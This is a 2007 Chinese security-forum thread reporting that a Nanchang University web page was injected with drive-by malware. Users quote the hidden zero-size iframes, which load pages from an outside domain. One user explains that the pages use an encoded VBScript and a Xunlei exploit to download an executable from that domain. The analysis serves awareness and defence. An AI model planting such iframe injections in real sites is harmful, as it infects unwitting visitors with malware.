查看: 3396|回复: 14
收起左侧

[病毒样本] 大学的正规网站也被挂马了!

[复制链接]
huaxiang954
发表于 2007-7-5 16:15:40 | 显示全部楼层 |阅读模式
如果你是南昌大学的学生请注意了。南昌大学教务在线有病毒!
地址:http://jwc.ncu.edu.cn/jiaowu

评分

参与人数 1经验 +4 收起 理由
绅博周幸 + 4 加分鼓励

查看全部评分

Nerazzurri
发表于 2007-7-5 16:16:54 | 显示全部楼层
我是南昌人但我不在南昌大学读书,点了链接,NOD32没反应。
1688388728
发表于 2007-7-5 16:18:23 | 显示全部楼层
没反应
我的世界
发表于 2007-7-5 16:21:54 | 显示全部楼层
大学网页被挂马很奇怪吗?我们的校园网已经被挂了N个了,可还是没有人去管。可不是我敏感啊,很多杀软都报有毒。
wangjay1980
发表于 2007-7-5 16:24:12 | 显示全部楼层
iframe src="http://www.wg161.cn/141.htm?701979" width="0" height="0" frameborder="0"iframe

是这个吗
wangjay1980
发表于 2007-7-5 16:26:10 | 显示全部楼层
iframe src="14.htm" width="0" height="0" border="0"iframe
iframe src="IENoRun.htm" width="0" height="0" border="0"iframe
iframe src="xunlei.htm" width="0" height="0" border="0"iframe
The EQs
发表于 2007-7-5 16:28:10 | 显示全部楼层
昨晚冒险去毒网。。。。发现N多都已经被清理了。。。
自由
发表于 2007-7-5 18:32:59 | 显示全部楼层
难道打补丁了?进去什么都没有
westbeck
发表于 2007-7-5 19:15:17 | 显示全部楼层
hxxp://jwc.ncu.edu.cn/jiaowu
被挂<iframe src="http://www.wg161.cn/141.htm?701979"

width="0" height="0" >
<iframe src="14.htm" width="0" height="0"

border="0"></iframe><iframe src="IENoRun.htm"

width="0" height="0" border="0"></iframe><iframe

src="xunlei.htm" width="0" height="0"

border="0"></iframe>
14.htm,VBScript.Encode加密,下面还有段10进制加密的,解密出来是骂某杀软的的:https="rav is rubbish" ; )
IENoRun.htm,自定义S函数,做了一些处理。
xunlei.htm,名字已经告诉你了,利用迅雷的漏洞,解密出来果然如此。
3个网页都是下同一个病毒:hxxp://www.wg161.cn/xy.exe

[ 本帖最后由 westbeck 于 2007-7-5 19:16 编辑 ]
solcroft
发表于 2007-7-5 19:18:14 | 显示全部楼层

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-5-11 00:31 , Processed in 0.123994 second(s), 19 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表